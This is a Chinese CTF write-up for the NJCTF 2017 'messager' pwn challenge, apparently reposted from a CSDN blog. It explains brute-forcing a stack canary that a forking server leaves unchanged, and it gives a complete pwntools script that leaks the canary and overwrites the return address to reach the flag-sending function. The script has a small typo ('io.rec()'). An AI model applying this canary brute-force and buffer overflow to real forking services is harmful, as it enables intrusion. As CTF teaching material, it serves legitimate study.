当前位置:网站首页>NJCTF 2017messager

NJCTF 2017messager

2022-07-17 12:04:00 Day-3

首先要写一个flag文件。

echo “FLAG{THIS_IS_FLAG}” > flag

程序一开始就将flag从文件里去除,存放到unk_602160,相应的也有一个通过socket发送flag的函数sub_400BC6(),最终目的就是控制程序返回到这个函数。
本题开启了Canary保护,但他是每次开启一个子进程,所以Canary的值不变,我们可以将它爆破出来,注:一定要使用python2,如果有师傅知道为什么使用python3不可以的话,也非常希望你能告诉我。
在这里插入图片描述

from pwn import *

def leak_canary():
	global canary
	canary = "\x00"
	while len(canary) < 8:
		for x in range(0, 256):
			io = remote("127.0.0.1", 5555)
			io.recv()
			io.send("A"*104 + canary + chr(x))
			try:
				io.recv()
				canary += chr(x)
				break
			except:
				continue
			finally:
				io.close()
	print(canary)
	# print("canary: 0x%s" % canary.encode('hex'))

def pwn():
	io = remote("127.0.0.1", 5555)
	io.rec()

	payload = flat(['A' * 104,canary,"A"*8,p64(0x400bc6)])
	io.send(payload)
	print(io.recvline())

if __name__=='__main__':
	leak_canary()
	pwn()
原网站

版权声明
本文为[Day-3]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_61823031/article/details/125829438

边栏推荐

猜你喜欢

随机推荐